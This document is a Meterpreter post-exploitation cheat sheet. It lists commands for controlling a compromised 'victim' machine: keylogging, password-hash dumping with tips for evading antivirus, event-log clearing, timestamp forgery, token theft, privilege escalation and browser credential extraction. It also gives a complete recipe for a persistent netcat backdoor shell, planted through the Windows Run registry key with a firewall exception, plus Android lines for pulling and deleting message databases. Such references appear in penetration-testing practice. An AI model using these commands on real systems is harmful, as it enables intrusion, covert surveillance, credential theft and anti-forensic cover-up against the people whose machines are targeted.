background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
migrate - moves the active process to a designated PID
run - executes the meterpreter script designated after it
quit - terminates the meterpreter session

cat - reads a file and outputs its contents to stdout
download - downloads a file from the victim system to the attacker system
upload - uploads a file from the attacker system to the victim
mkdir - makes a directory on the victim system
rmdir - removes a directory on the victim system

ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - views or modifies the victim routing table

clearev - clears the event logs on the victim's computer
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - gets the user that the server is running as
kill - terminates the process designated by the PID
reg - interacts with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified process (PID)
sysinfo - gets details about the victim computer such as OS and name

enumdesktops - lists all accessible desktops
getdesktop - gets the current meterpreter desktop
idletime - checks how long the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or a browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components

getsystem - uses 15 built-in methods to gain sysadmin privileges
hashdump - grabs the hashes in the password (SAM) file. Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.
timestomp - manipulates the modify, access, and create attributes of a file

Example: netcat persistence through the Run registry key and a firewall exception:
upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
netsh firewall add portopening TCP 443 "Service Firewall" ENABLE ALL

Android examples:
download msgstore.db.crypt8   # will take a long time
delete data/data//databases/mmssms.db

Clean-up after getgui:
#run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up_

TOP scripts: checkvm, getcountermeasure, getgui, get_local_subnets, gettelnet, hostsedit, killav, remotewinenum, scraper, winenum

arp_scanner.rb - Script for performing an ARP scan discovery.
autoroute.rb - Adds routes through the meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if the target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting the domain admin account list.
dumplinks.rb - Parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. .lnk files contain time stamps, file locations (including share names), volume serial numbers and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, give a meterpreter session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a Chrome installation.
enum_firefox.rb - Script for extracting data from Firefox.